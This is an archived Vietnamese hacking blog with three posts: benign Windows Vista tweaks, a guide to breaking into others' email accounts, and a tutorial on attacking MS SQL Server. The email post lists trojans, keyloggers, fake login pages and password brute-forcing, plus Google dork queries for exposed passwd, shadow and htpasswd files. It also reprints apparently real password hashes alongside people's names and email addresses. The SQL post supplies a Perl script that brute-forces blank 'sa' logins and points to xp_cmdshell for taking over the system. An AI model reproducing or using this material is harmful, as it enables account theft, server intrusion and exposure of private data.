Lưu trữ

Archive for the ‘Hacking’ Category

10 cách “hack” Windows Vista

Tháng Mười 7, 2008 Để lại phản hồi

Bạn đang chạy Windows Vista và muốn sử dụng giao diện mĩ miều của Aero. Nhưng có thể bạn sẽ phải “hack” cấu trúc bên trong của Vista để có thể thấy được giao diện đó.
Có rất nhiều cách để có thể hack Windows Vista và đây là 10 cách trong số đó. Bạn có thể chỉnh sửa bất cứ cái gì, từ tốc độ của Windows Aero tới mở khóa tài khoản quản trị siêu ẩn, kích hoạt nội dung menu chuột phải… thậm chí có thể tấn công tới cả quyền điều khiển tài khoản người dùng (User Account Control). Vì vậy nếu bạn thực sự muốn điểu khiển được Windows Vista, hãy tập trung vào để đọc bài này.
Cảnh báo: Một vài mẹo trong bài này đòi hỏi phải chỉnh sửa Windows Registry (nó sẽ gây ra một số điều nguy hiểm cho máy tính), vì vậy trước khi đụng chạm tới Registry, bạn hãy sử dụng System Restore để tạo một điểm khôi phục để có thể khôi phục lại máy tính khi cần thiết. Để tạo điểm khôi phục trong Windows Vista, bạn chọn Control Panel > System and Maintenance > Restore files from backup > Create a restore point or change settings
I. Hack User Account Control
User Account Control (UAC) của Windows Vista là một tính năng bị mọi người chê trách nhiều nhất trong hệ điều hành mới này. Chắc chán một điều là nó giúp cho bạn được bảo vệ tốt hơn nhưng đôi khi lại gây ra quá nhiều phiền hà.
Nếu bị các drive UAC luôn làm phiền, bạn có thể tắt nó đi. Có vài cách để làm được việc đó và một trong số cách đó như sau: chọn Control Panel > User Accounts and Family Safety > User Accounts, sau đó kích vào Turn User Account Control on or off.
Bạn có thể sử dụng cách khác là chạy System Configuration Utility bằng cách nhập msconfig vào phần dòng lệnh hoặc vào ô search trong menu Start. Khi công cụ này chạy, chọn tab Tools và kéo thanh trượt xuống cho đến khi nhìn thấy Disable UAC. Chọn nó và kích vào nút Launch, sau đó khởi động lại máy. Để bật UAC trở lại bạn hãy làm các bước tương tự nhưng chọn Enable UAC.
Nếu là một người thích chỉnh sửa Registry, bạn có thể vô hiệu hóa UAC thông qua Registry Editor. Để khởi chạy Registry Editor, nhập regedit vào ô Search trong menu Start hoặc trên cửa sổ lệnh, nhấn Enter và vào nhánh sau:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\
Policies\System\EnableLUA
Đặt cho giá trị của nó là 0. Bạn sẽ cần khởi động lại máy sau khi đã thay đổi Registry.
UAC chỉ làm phiền trong những tài khoản thường sử dụng của Windows Vista. Khi chạy một vài câu lệnh từ cửa sổ lệnh, bạn sẽ được nhắc là không đủ quyền quản trị thực sự để chạy chúng, thậm chí cả khi đang truy cập với một tài khoản quản trị.
Đó là lý do tại sao UAC yêu cầu bạn chạy cửa sổ lệnh như một quản trị viên để có thể gọi hoạt động của cửa sổ lệnh nâng cao. Nếu đơn giản chỉ truy cập với quyền quản trị viên là không đủ, mặc dù vậy bạn vẫn có thể truy cập cửa sổ lệnh nâng cao.
Có một cách để làm điều đó là gõ cmd vào ô Search trên menu Start, kích chuột phải vào biểu tượng cửa sổ lệnh xuất hiện ở phía trên menu Start, chọn Run as administrator.
Nhưng nếu bạn muốn sử dụng được cửa sổ lệnh nâng cao mỗi khi chạy cửa sổ lệnh thông thường? Rất đơn giản. Bạn chỉ cần tạo một shortcut cửa sổ lệnh nâng cao trên nền desktop hoặc gắn nó lên menu Start.
Để tạo shortcut trên destop làm như sau:
1. Kích chuột phải vào nền desktop, chọn New > Shortcut.
2. Trong ô trống trên cửa sổ Create Shortcut, nhập vào cmd và kích Next.
3. Trên cửa sổ tiếp theo, nhập vào tên của shortcut (ví dụ là Elevated Command Prompt), sau đó kích Finish.
4. Kích chuột phải vào shortcut vừa tạo chọn Properties
5. Chọn tab Shortcut và kích vào nút Advanced.
6. Chọn ô tương ứng với phần Run as administrator, kích OK và sau đó OK lần nữa.
Giờ thì nếu bạn muốn chạy cửa sổ lệnh nâng cao bất cứ lúc nào, chỉ cần kích đúp vào shortcut đã tạo. Nếu muốn biểu tượng khởi chạy đó có trên menu Start, bạn chỉ cần kéo nó từ nền Desktop lên nút Start và đặt nó tại vị trí mà bạn muốn.
II. Mở khóa tài khoản quản trị siêu ẩn
Sâu bên trong Windows Vista có một tài khoản quản trị ẩn. Nó hoàn toàn khác so với tài khoản quản trị thông thường mà bạn thường thiết lập trên PC. Tài khoản này không phải là một phần trong nhóm quản trị. Nó là một loại “siêu quản trị”, gần giống như tài khoản gốc trong Unix và mặc định nó luôn được tắt và ẩn.
Trong các phiên bản trước Windows Vista, tài khoản quản trị luôn ẩn và rất nhiều người sử dụng nó như một tài khoản chính duy nhất. Tài khoản này luôn có toàn quyền đối với máy tính.
Trong Windows Vista, Microsoft đã thay đổi. Tài khoản quản trị ẩn không lệ thuộc vào UAC nhưng tài khoản quản trị thông thường thì có. Vì vậy, tài khoản quản trị ẩn có thể tạo bất kỳ thay đổi nào đối với hệ thống như bạn đã thấy trong phần các câu lệnh UAC.
Việc bật tài khoản quản trị ẩn này rất dễ dàng. Đầu tiên bạn mở cửa sổ lệnh nâng cao bằng cách trên (nếu đã tạo shortcut thì việc này càng đơn giản)
Sau đó nhập vào câu lệnh sau rồi nhấn Enter: Net user administrator /active:yes
Vậy là từ giờ, tài khoản quản trị ẩn sẽ luôn được hiển thị như một lựa chọn trên màn hình Welcome như bất kỳ các tài khoản user khác mà bạn đã thiết lập. Việc sử dụng nó cũng như bất kỳ tài khoản nào khác. Khi mới bật lên thì tài khoản này sẽ chưa có password, vì vậy đầu tiên bạn nên thiết lập password cho nó.
Nếu muốn vô hiệu hóa và ẩn tài khoản quản trị ẩn đi, nhập vào câu lệnh sau trên cửa sổ lệnh nâng cao và nhấn Enter: Net user administrator /active:no
III. Sử dụng giao diện “gương” Aero
Các đường viền xung quanh cửa sổ hệ thống (như đường viền của hộp thoại hay cửa sổ Control Panel) nhìn trong suốt trong giao diện Aero của Windows Vista
Để chỉnh sửa đường viền rộng hơn hay hẹp hơn:
1. Kích chuột phải vào nền desktop và chọn Personalize.
2. Kích chọn Window Color and Appearance.
3. Chọn Open classic appearance properties for more color options.
4. Từ cửa sổ xuất hiện, hãy đảm bảo rằng Windows Aero được chọn như hệ thống màu sẵn có. Kích vào nút Advanced trên phần bên phải của cửa sổ. Hộp thoại Advanced Appearance sẽ xuất hiện.
5. Chọn Border Padding trên menu lựa chọn Item. Để thay đổi kích thước của đường viền, bạn hãy nhập giá trị kích thước mới cho đường viền (mặc định là 4). Kích OK hai lần. Kích thước của các đường viền sẽ được thay đổi ngay.
Có nhiều cách để có thể thực hiện tương tự với đường viền. Để thay đổi màu, độ trong suốt của đường viền… kích chuột phải vào nền màn hình, chọn Personalize > Window Color and Appearance.
1. Chọn màu cho cửa sổ ở phần trên của màn hình, hoặc tự tùy chỉnh màu bằng cách kích vào Show color mixer và sau đó di chuyển các thanh trượt để có được màu ưa thích.
2. Để thay đổi độ trong suốt của đường viền cửa sổ, di chuyển thanh trượt Color intensity về phía bên trái hoặc bên phải.
IV. Bảo vệ bảo mật riêng tư bằng cách gỡ bỏ siêu dữ liệu Windows Vista
Một trong các tính năng hữu ích nhất của Vista cũng là một trong những tính năng nguy hiểm nhất – tính hữu ích của siêu dữ liệu. Siêu dữ liệu là thông tin về các file mà bạn không trông thấy một cách bình thường nhưng có thể giúp để dễ dàng tìm kiếm chúng.
Ví dụ, đặc trưng của các file nhạc là có chứa tên của người sáng tác, loại nhạc… Một file ảnh thì thường chứa dữ liệu thời gian chụp, người chụp, loại máy và nhiều thông tin khác như tốc độ ISO. Các văn bản, bảng tính thì có chứa nhiều thông tin mở rộng khác nhau về người tạo ra văn bản đó (bao gồm người tạo, thời gain tạo và chỉnh sửa, người xem…
Trong nhiều trường hợp, các chương trình tự động sinh ra các thông tin siêu dữ liệu của người sở hữu khi file được tạo. Người dùng có thể dễ dàng tạo và chỉnh sửa siêu dữ liệu bằng cách kích chuột phải vào file, chọn Properties và chọn tab Details. Sau đó kích vào bất kỳ trường nào và nhập lại trong siêu dữ liệu. Có một số thông tin phải được giữ lại, như thời gian file được in, không thể thay đổi.
Siêu dữ liệu này có thể khá hữu ích bởi Windows Vista có thể tìm kiếm bằng cách sử dụng các thông tin đó. Ví dụ, nếu muốn tìm kiếm mọi bài hát của Mozart trên máy tính, bạn chỉ cần nhập Mozart vào ô tìm kiếm và Vista sẽ tìm trong siêu dữ liệu ra tất cả các bài hát của Mozart.
Nhưng trong một số trường hợp, bạn lại không muốn các siêu dữ liệu trong file của mình bị người khác xem được. Ví dụ, nhà phân tích của hãng Gartner Inc. đã chỉ ra rằng doanh nghiệp phải nhúng siêu dữ liệu vào trong các file về một khách hàng, và doanh nghiệp tất nhiên sẽ không muốn người nào khác nhìn thấy chúng. Có một vài cách đơn giản để cá nhân hóa siêu dữ liệu trong các tài liệu của bạn, những thông tin mà bạn không muốn ai thấy.
Thật dễ dàng để bỏ bất kỳ siêu dữ liệu nào từ bất kỳ file nào:
1. Mở Windows Explorer và kích chuột phải vào file.
2. Chọn Properties
3. Chọn tab Details. Một màn hình hiển thị siêu dữ liệu của tài liệu sẽ xuất hiện như hình dưới.
4. Kích vào liên kết Remove Properties and Personal Information ở phía dưới của cửa sổ. Hộp thoại Remove Properties sẽ xuất hiện.
5. Chọn Remove the following properties from this file và kích các ô tương ứng với siêu dữ liệu mà bạn muốn bỏ. Kích OK. Các siêu dữ liệu được lựa chọn sẽ bị gỡ bỏ.
6. Ngoài ra còn một lựa chọn giúp bạn có thể tạo một bản sao của tài liệu với tất cả các siêu dữ liệu đều bị bỏ. Chọn Create a copy with all possible properties removed và kích OK.
Bạn có thể bỏ siêu dữ liệu từ nhiều file cùng một lúc. Lựa chọn tất cả các file mà bạn muốn bỏ siêu dữ liêu, kích chuột phải vào chúng và làm theo hướng dẫn như trên. Hoàn toàn hợp lệ để có thể thực hiện điều này, tuy vậy, những file đó phải có cùng các trường siêu dữ liệu để có thể gõ bỏ cùng một lúc.
V. Tăng khả năng của menu ngữ cảnh trong Windows Vista
Menu xuất hiện khi kích chuột phải (còn gọi là menu ngữ cảnh) trong Windows Explorer của Vista khá hữu ích. Kích chuột phải một file, menu ngữ cảnh sẽ xuất hiện, thông qua đó bạn có thể thực hiện một số hoạt động như mở, in, xóa, copy hay tạo shortcut của file đó. Các tùy chọn xuất hiện khác nhau tùy thuộc vào thiết lập hệ thống của bạn và các chương trình mà bạn đã cài đặt.
Nếu muốn bạn có thể thêm tùy chọn vào menu ngữ cảnh. Giữ phím Shift, đồng thời kích chuột phải vào file, bạn sẽ thấy một vài tùy chọn menu mới được đánh dấu bằng các mũi tên (như hình bên)
Tác dụng của từng tùy chọn mới như sau:
- Open as Read-Only: như là tên của nó, nó sẽ mở file như là một file chỉ đọc (không được phép ghi).
- Pin to Start Menu: Phần này sẽ tạo một shorcut cho file ở phần phía trên của menu Start. Để gỡ bỏ shortcut này từ menu Start, kích chuột phải vào shortcut và chọn Remove from this list.
- Add to Quick Launch: Tùy chọn này sẽ thêm một shortcut của file lên thanh công cụ Quick Launch (thanh công cụ ở bên trái của Taskbar). Để bỏ shortcut này, kích chuột phải vào nó và chọn Delete.
- Copy as Path: Tùy chọn này sẽ sao chép nên và đường dẫn file vào bộ đệm của Windows (Ví dụ: C:\Budget\2007 memo.xls). Bạn có thể dán nội dung này vào vị trí thích hợp ngay sau đó.
VI. Tăng tốc độ hoặc tắt Windows Aero
Windows Aero có thể là phần lôi cuốn của giao diện nhưng nó còn phụ thuộc vào phần cứng máy bạn. Nó có thể làm chậm dần hệ thống của bạn. Hãy làm tăng tốc độ của máy tính lên bằng cách tắt hoàn toàn nó hoặc tắt một vài tính năng Aero nhưng vẫn cho phép một số tính năng khác hoạt động.
Để tắt Aero:
1. Kích chuột phải vào nền desktop của Windows, chọn Personalize > Window Color and Appearance.
2. Kích chọn Open classic appearance properties for more color options.
3. Trong phần hộp thoại Color scheme sổ xuống, chọn Windows Vista Basic hoặc Windows Vista Standard. Kích OK và Aero sẽ được tắt.
Nhưng lại có một số thứ bạn rất thích ở Aero (như các hoạt ảnh cửa sổ) và có một số thứ lại không thích (như các cửa sổ trong suốt)? Bạn hoàn toàn có thể tắt đi một vài tính năng Aero để làm tăng tốc độ máy tính nhưng vẫn giữ lại được một số tính năng ưa thích.
Để làm điều này, chọn Start > Computer > System Properties. Kích vào Advanced system settings, sau đó, trong phần Performance bạn chọn nút Settings. Trong cửa sổ giao diện như hình dưới, chọn Custom, bỏ chọn những tính năng mà bạn muốn tắt, sau đó kích OK
VII. Bỏ qua giao diện log-on vào Windows Vista trên nhiều tài khoản
Khi bạn có hơn một tài khoản người dùng trên một máy tính Windows Vista, mỗi một lần khởi động lại máy bạn lại thấy danh sách màn hình Welcome của tất cả các tài khoản trên máy. Kích chọn một trong số đó và nhập vào thông tin truy cập để có thể vào sử dụng Windows Vista.
Vậy nếu bạn muốn vừa có thể sử dụng một tài khoản chính được sử dụng gần nhất và vẫn có thể chọn các tài khoản khác tùy từng thời điểm? Bạn nên tạo một “đường tắt” tới màn hình Welcome chứa danh sách tất cả các tài khoản người dùng, sau đó tự động truy cập vào khi bạn khởi động lại Windows Vista – trong khi Vista dường như không thể thực hiện được nhiệm vụ đơn giản này.
Trên thực tế, bạn hoàn toàn có thể làm được bằng cách xem các bước dưới đây. Thực hiện theo hướng dẫn, bạn sẽ tự động truy cập vào một tài khoản chính mà vẫn có thể lựa chọn tài khoản khác khi cần:
1. Tại phần Search hay cửa sổ lệnh, nhập vào control userpasswords2 và nhấn Enter. Màn hình User Accounts sẽ xuất hiện.

2. Chọn tài khoản mà bạn muốn tự động đăng nhập, sau đó bỏ chọn tại phần Users must enter a user name and password to use this computer. Kích OK.

3. Hộp thoại Automatically Log on xuất hiện. Nhập mật khẩu vào ô cho tài khoản mà bạn muốn tự động truy cập. (Nếu tài khoản hiển thị không có cái mà bạn muốn tự động truy cập, hãy nhập chính xác tên username và password cho tài khoản. Kích OK.

4. Vậy là từ bây giờ, bạn sẽ tự động truy cập sử dụng tài khoản đã chọn. Khi muốn truy cập vào mà muốn lựa chọn các tài khoản khác, sử dụng Fast User Switching: Kích vào nút Start, kích vào mũi tên ở góc dới phải của menu Start, chọn Switch User. Bạn sẽ thấy màn hình chứa danh sách của toàn bộ các tài khoản trên máy tính, khi đó hãy chọn tài khoản cần truy cập.
VIII. Thay đổi con trỏ nhấp nháy của Vista
Con trỏ nhấp nháy của Windows Vista là một hình xược dọc mỏng như dao cạo và thỉnh thoảng bạn có thể khó nhìn thấy nó nó, đặc biệt là khi sử dụng laptop. Nhưng nếu muốn thì rất dễ dàng để thấy nó, thậm chí tạo ra một con trỏ đậm hơn. Chọn Control Panel > Ease of Access > Optimize visual display. Kéo thanh trượt xuống dưới màn hình, cho đến khi thấy phần Make things on the screen easier to see.

Từ đây, bạn có thể cho đậm hơn con trỏ của Windows Vista. Trong hộp sổ xuống bên cạnh phần Set the thickness of the blinking cursor, hãy chọn số thích hợp. Số càng lớn thì con trỏ càng đậm. Bạn có thể xem trước độ dày của con trỏ tại phần Preview ở bên cạnh menu sổ xuống. Kích vào Save. Toàn bộ con trỏ Trong Windows Vista sẽ đậm hơn và dễ thấy hơn.
IX. “Hack” màn hình nghỉ của Vista
Có nhiều nguyên nhân không giải thích được khi Microsoft không cho phép bạn tùy chọn chê độ làm việc của màn hình nghỉ trong Windows Vista. Ví dụ, thay đổi cách sủi bọt trong màn hình nghỉ Bubbles, hay thay đổi số lượng và độ dày của các dải ruy băng trong màn hình nghỉ Ribbons.
Để tùy chỉnh màn hình nghỉ Bubbles, bạn hãy khởi động Registry Editor bằng cách nhập regedit vào ô Search trong Start hoặc nhập trong cửa sổ lệnh, sau đó nhấn Enter.
1. Vào phần:
HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\
Screensavers\Bubbles
Chọn Edit > New DWORD (32-bit) Value và tạo một DWORD mới với tên MaterialGlass. Nhập giá trị 1 trong phần Value data nếu bạn muốn bong bóng có màu thùy tinh trong suốt, còn nhập giá trị 0 cho bong bóng kim loại.
2. Tạo một DWORD có tên ShowShadows và đưa vào giá trị 1 để hiện thị bóng ở bên dưới bong bóng, và giá trị 0 nếu không muốn có bóng.
3. Tạo một DWORD có tên ShowBubbles và đưa vào giá trị 1 nếu muốn hiển thị bong bóng trên nền desktop, và giá trị 0 nếu muốn trả lại nền ban đầu.
Bạn có thể hack tương tự với màn hình nghỉ Ribbons. Để làm điều này, mở Registry Editor và:
1. Vào phần
HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\
Screensavers\Ribbons
Chọn Edit > New DWORD (32-bit) Value, và tạo một DWORD mới với tên NumRibbons. Kích vào Decimal, và nhập giá trị số ruy băng mà bạn muốn hiện thị. Số lượng tối thiếu là 1 và tối đa là 256
2. Tạo một DWORD với tên RibbonWidth, chọn Decimal và nhập vào giá trị độ dày cho từng ruy băng. Số càng nhỏ ruy băng càng mảnh.
3. Khi kết thúc Registry Editor, các thiết lập mới của bạn sẽ bắt đầu có tác dụng

Nếu muốn thay đổi bất kỳ một thiết lập nào cho từng màn hình nghỉ, bạn phải vào Registry, tìm đến DWORD thích hợp và thay đổi giá trị. Để khôi phục lại các thiết lập gốc, bạn hãy xóa các Registry đã tạo.
X. Tạo hoạt ảnh chậm khi phóng to/thu nhỏ cửa sổ
Giờ là phần có thể làm tạp bẩn trong Registy và cũng là phần cuối cùng của bài hack thú vị này. Nó hoàn toàn phục vụ cho mục đích giải trí và vui mắt. Nó cho phép bạn làm chậm lại quá trình hoạt động hoạt ảnh khi đóng nhỏ và phóng to các cửa sổ trên thanh Taskbar.
Để làm điều này, trước hết bạn phải chỉnh sửa Registry, sau đó khi muốn làm chậm các hoạt ảnh, hãy giữ phím Shift. Nhả phím Shift ra thì các hoạt ảnh lại trở về tố độ thông thường.
Khở động Registry Editor và thực hiện các thao tác sau
1. Vào HKEY_CURRENT_USER\Software\Microsoft\Windows\DWM2.
2. Chọn Edit > New DWORD (32-bit) Value và tạo một DWORD mới với tên AnimationsShiftKey. Đặt cho nó giá trị là 1.
3. Đóng Registry Editor, log off ra khỏi Windows và sau đó log vào trở lại hoặc nếu không thì khởi động lại máy.
4. Giữ phím Shift và phóng to hay thu nhỏ một cửa sổ. Hoạt ảnh sẽ chậm lại đáng kể. Để hoạt ảnh trở về tốc độ bình thường thì bạn chỉ cần nhả phím Shift ra.

Categories: Hacking Thẻ:

Hack Mail

Tháng Mười 7, 2008 Để lại phản hồi

Cach 1 :
Hỏi trực tiếp : thật điên rồ .
Cach 2 :
Bạn biết thông tin về người đó ,vậy hãy nhỡ yahoo giúp đỡ.Cách này trược kia có thể thực hiện được nhưng bây giờ yahoo không cho request.

Cach 3 :
Sử dụng virut-trojan. đây là cách hay sử dụng nhất của hacker.Có rất nhiều bài viết hướng dẫn các bạn hãy tự tham khảo.Có hàng trăm virut trojan cho bạn lựa chọn tùy bạn thui.
Cach 4 :
Sử dụng các chương trình crack(bẻ )
ví dụ yahoomail thì có:crackpassyahoo
hotmail thì có :crack passhotmail.
Cach 5 :
Sử dụng các chương trình fake( bẫy lỗi) như fake login, giả giao diện mail…….
Cach 6 :Bạn có một website tại sao không sử dụng Godwill gắn chúng vô web .
Cach 7 : Nếu ở dịch vụ bạn đang ngồi có thể sử dụng keylogger 5.04,perfecf keyloggerv1.47, starrcmd……..rất nhiều.
Cach 8 : Tấn công phê chuẩn đầu vào .
với cách này bạn có thể vào mail mà không cần đăng nhập .Thật bất ngờ khi vào mà không cần biết pass hì.

Cach 9 :
Lỗi đơn giản lắm password yahoo bị mắc lỗi default password
” yahoo***”
vậy *** ở đây là gì đơn giản là 3 con số những số này nằm trong khoảng từ 0–>999 việc brute chở nên dễ dàng rồi………….
Tuy nhiên big problem nằm ở chỗ nếu hì hục nghiên cứu làm sao modify info ngay tại yahoo thì có vẻ như không được ổn . Nhớ rằng yahoo là reseller của INWW việc chúng ta cần làm là nhào vô cái Registry key để lấy info sau đó quay ra inww.com để change infor
Chúc các bạn thành công. (Nhưng trong 9 cách này, bi giờ chắc chỉ còn áp dụng được một vài cách thoai! “Gà” bây giờ hiếm lắm nên cũng hok “Múa rìu qua mắt …pro” được!

*Hack bằng Google:
Cách đây vài ngày tôi có đọc trên một forum nói về cách có thể dùng Goggle.com để tìm các thông tin quan trọng mà không cần bẻ khóa một website nào hết.
Bạn biết đối Google.com khi “search” bạn có thể dùng một số từ khóa để tìm một số cụm từ của các website thường không muốn người khác vào.Google là một công cụ tuyệt vời nếu các bạn dùng sẽ cảm thấy nó hay thế nào
Vậy chúng ta hảy bắt đầu nha.
Bạn vào website google.com và bắt đầu đánh dòng lệnh sau trên ô Search:

allintitle: “index of/root”

Sau đó bạn sẻ thấy khoảng 3120 sites có cụm từ này, bây giờ bạn có thể từng cái một kiểm tra xem có thông tin nào bạn cần không,

Thế nhưng có bạn không thích các thông tin này, nhưng lại thích tìm hiểu về password của admin các site, các bạn có thể đánh dòng lệnh sau:

inurl:”auth_user_file.txt”

Wow, bây giờ các bạn tha hồ mà nghiên cứu password & username, khi tôi đánh dòng lệnh này, website đầu tiên mà tôi bấm vào là Here và nó cho tôi data như sau:

$1$nr$90wmeMQIDw0HforiU2vUG1|admin|admin|Martin|Kl ässner|martin-klaessner@online.de|on
$1$nr$90wmeMQIDw0HforiU2vUG1|Klaessner_Martin|norm al|Martin|Klässner|martin-klaessner@online.de|on
$1$nr$90wmeMQIDw0HforiU2vUG1|Klaessner_Juergen|nor mal|Jürgen|Klässner|juergen-klaessner@online.de|on
$1$as$reDTTzzp8RaJUXVjXNksi0|Mauer_Harald|normal|H arald|Mauer|hmauer@germering.baynet.de|on

Cái này là cái gì vậy nè, phần này dành cho các cao thủ diển dịch nhen hihihi.

Nói chung với Google.com các bạn có thể dùng các chuổi sau đây, và chắc chắn các bạn sẻ không bao giờ chán khi lên net nửa đâu.

“Index of /admin”
“Index of /password”
“Index of /mail”
“Index of /” +passwd
“Index of /” +password.txt
“Index of /” +.htaccess
index of ftp +.mdb allinurl:/cgi-bin/ +mailto

administrators.pwd.index
authors.pwd.index
service.pwd.index
filetype:config web
gobal.asax index

allintitle: “index of/admin”
allintitle: “index of/root”
allintitle: sensitive filetypeoc
allintitle: restricted filetype :mail
allintitle: restricted filetypeoc site:gov

inurlasswd filetype:txt
inurl:admin filetypeb
inurl:iisadmin
inurl:”auth_user_file.txt”
inurl:”wwwroot/*.”

top secret site:mil
confidential site:mil

allinurl: winnt/system32/ (get cmd.exe)
allinurl:/bash_history

intitle:”Index of” .sh_history
intitle:”Index of” .bash_history
intitle:”index of” passwd
intitle:”index of” people.lst
intitle:”index of” pwd.db
intitle:”index of” etc/shadow
intitle:”index of” spwd
intitle:”index of” master.passwd
intitle:”index of” htpasswd
intitle:”index of” members OR accounts
intitle:”index of” user_carts OR user_cart

ALTERNATIVE INPUTS

_vti_inf.html
service.pwd
users.pwd
authors.pwd
administrators.pwd
shtml.dll
shtml.exe
fpcount.exe
default.asp
showcode.asp
sendmail.cfm
getFile.cfm
imagemap.exe
test.bat
msadcs.dll
htimage.exe
counter.exe
browser.inc
hello.bat
default.asp\
dvwssr.dll
cart32.exe
add.exe
index.jsp
SessionServlet
shtml.dll
index.cfm
page.cfm
shtml.exe
web_store.cgi
shop.cgi
upload.asp
default.asp
pbserver.dll
phf
test-cgi
finger
Count.cgi
jj
php.cgi
php
nph-test-cgi
handler
webdist.cgi
webgais
websendmail
faxsurvey
htmlscript
perl.exe
wwwboard.pl
www-sql
view-source
campas
aglimpse
glimpse
man.sh
AT-admin.cgi
AT-generate.cgi
filemail.pl
maillist.pl
info2www
files.pl
bnbform.cgi
survey.cgi
classifieds.cgi
wrap
cgiwrap
edit.pl
perl
names.nsf
webgais
dumpenv.pl
test.cgi
submit.cgi
guestbook.cgi
guestbook.pl
cachemgr.cgi
responder.cgi
perlshop.cgi
query
w3-msql
plusmail
htsearch
infosrch.cgi
publisher
ultraboard.cgi
db.cgi
formmail.cgi
allmanage.pl
ssi
adpassword.txt
redirect.cgi
cvsweb.cgi
login.jsp
dbconnect.inc
admin
htgrep
wais.pl
amadmin.pl
subscribe.pl
news.cgi
auctionweaver.pl
.htpasswd
acid_main.php
access.log
log.htm
log.html
log.txt
logfile
logfile.htm
logfile.html
logfile.txt
logger.html
stat.htm
stats.htm
stats.html
stats.txt
webaccess.htm
wwwstats.html
source.asp
perl
mailto.cgi
YaBB.pl
mailform.pl
cached_feed.cgi
global.cgi
Search.pl
build.cgi
common.php
show
global.inc
ad.cgi
WSFTP.LOG
index.html~
~
index.html.bak
.bak
print.cgi
register.cgi
webdriver
bbs_forum.cgi
mysql.class
sendmail.inc
CrazyWWWBoard.cgi
search.pl
way-board.cgi
webpage.cgi
pwd.dat
adcycle
post-query
help.cgi

Chúc các bạn may mắn và tìm thấy nhửng gì muốn tìm hihiih

Categories: Hacking Thẻ:

Tấn Công Ms Sql Server

Tháng Mười 7, 2008 Để lại phản hồi

Giới thiệu : hồi giờ chúng ta tấn công vào server dùng MS SQL Server đa phần là dùng kĩ thuật SQL injection , đây là kĩ thuật hack phải nói là hay nhất , hiệu quả cao và nhanh chóng nhất , tuy nhiên trong bài này tôi sẽ đề cập đến 1 cách khác để hack vào MS SQL Server , cách này tuy xác suất thành công không cao bằng SQl injection nhưng cũng đáng để quan tâm bởi vì đâu phải lúc nào chúng ta cũng tìm thấy lỗi SQl injection .

Cách này của chúng ta tạm gọi là “TRSQL” vì đa phần là nhờ may mắn , nhưng chả hiểu sao hồi trước tới giờ tôi thấy cái may mắn này lại hay xảy ra .
Công cụ đầu tiên chúng ta cần là sqlbf (SQL Brute Force ) cái này cứ vào packetstorm mà tìm .
Và cái tool connect vào MS SQL Server : http://www.hvaonline.net/exploite/SqlExec.exe

Chúng ta bắt đầu :

Hầu hết MS SQL Server đầu chạy trên TCP port 1433 , còn nếu chạy trên port khác thì mình dùng công cụ scan là cũng ra ngay thôi . Cái MS SQL server mà chúng ta bàn luận ở đây hơi cũ chút là : SQL 6.5 & 7.0 . Tuy cũ nhưng tôi vẫn viết ra ở đây mục đích là học hỏi kinh nghiêm chứ không phải mục đích là tìm mục tiêu để hack phá phách . Download sqlbt về xong thì run nó , rất dễ dùng , công việc của nó là kiếm password cho chúng ta login . Nhược điểm của MS SQL server thứ nhất là mặc định system administrator là “sa” , do đó chúng ta không cần phải brute cái username mà chỉ cần brute force cái password là đủ , thứ 2 là default password của sa là “không có gì hết” , cái này mới chết người , ai cũng quan niệm là “chỗ nguy hiểm nhất chính là chỗ an toàn nhất” , bởi vậy password là “không có gì hết” thì đố ai ngờ được , sai lầm chết người của nhiều người quản trị mạng ở chỗ đó , vì chúng ta có sqlbf tool nên ai có suy nghĩ đó là chết liền .

Sẵn đây tôi cũng giới thiệu với các bạn cái tool scan server có password là “không có gì hết” :

save lại nội dung code sau thành file senseql.pl , và run :
—————————————————————————————————————————————————————————————————-
• scans for hosts with blank passwords
• Brute Forces login attempts.
#!/usr/bin/perl
## SQL username/password checker
## Parameters: senseql <IP> <username> <password>
## Eg. to check for blank SA:
## senseql 10.0.0.1 sa “”
## Roelof Temmingh / Haroon Meer
## roelof@sensepost.com / haroon@sensepost.com
## SensePost IT Security
## http://www.sensepost.com/ http://www.hackrack.com/
## 2001/11/09
use IO::Socket;
$|=1;
if ($#ARGV<2) {die “Usage: senseql IP username password\n”;}
$port=1433; $host=$ARGV[0]; $username=$ARGV[1]; $pass=$ARGV[2];
$unh=pack(”a30″,$username);$psh=pack(”a30″,$pass);
$numu=pack(”c”,length($username)); $nump=pack(”c”,length($pass));
$FRONT=”020002000000020000000000000000000000000000 0000000000000000000000000
00000000000″;
$REST=”3030303030306130000000000000000000000000000 0000000201881b82c08030106
0a090101000000000000000000737175656c646120312e3000 0000000000000000000000000
000000000000b0000000000000000000000000000000000000 0000000000000000000000000
00″;
$REST2=”000000000000000000000000000000000000000000 0000000000000000000000000
00000000000000000000000000000000000000000000000000 0000000000000000000000000
00000000000000000000000000000000000000000000000000 0000000000000000000000000
00000000000000000000000000000000000000000000000000 0000000000000000000000000
00000000000000000000000000000000000000000000000000 0000000000000000000000000
00000000000000000000000000000000000000000000000000 0000000000000000000000000
000000040200004d5344424c49420000000706000000000d11 0000000000000000000000000
00000000000000000000000″;
$hfront=pack(”H*”,$FRONT);$hrest=pack(”H*”,$REST); $hrest2=pack(”H*”,$REST2)
;
$FULL=$hfront.$unh.$numu.$psh.$nump.$hrest.$nump.$ psh.$hrest2;
$SENDY2=”02010047000002000000000000000001000000000 0000000000000000000000000
00000000000000000000000000000000000000000000000000 0000003030300000000300000
0″;
$SENDY2 = pack(”H*”,$SENDY2);
print “$host:$username:$pass:”;
$remote = IO::Socket::INET->new(Proto=>”tcp”,PeerAddr=>$host,PeerPort =>
$port) || die “No SQL here man…”;
print $remote $FULL; print $remote $SENDY2;
recv($remote,$back,100,MSG_PEEK);
if ($back =~ /context to ‘master’/) {print “Yep – go for it\n”}
else {print “No dude..\n”;}
close ($remote);
Lets move on… at least to admins who have had the sense to change the admin password

—————————————————————————————————————————————————————————————————-

Giả sử như sqlbt tìm ra password của sa và login vào với username “sa” , chúng ta phải làm gì đây để nắm hoàn toàn hệt thống ?

Giờ đây chúng ta có thể dùng Stores Procedures , đặc biệt là xp_cmdshell , vấn đề bi giờ giống như là chúng ta hack bằng SQL injection mà có quyền “sa” vậy . Sẵn đây tôi sẽ giới thiệu cho các bạn biết sơ về các Extended Stores Procedures cần thiết và chức năng của nó :

xp_regread – reads a registry value
xp_rewrite – writes to the registry
xp_regdeletekey – deletes a key
xp_regdeletevalue – deletes a key’s value
xp_regenumvalues – lists names of value entries
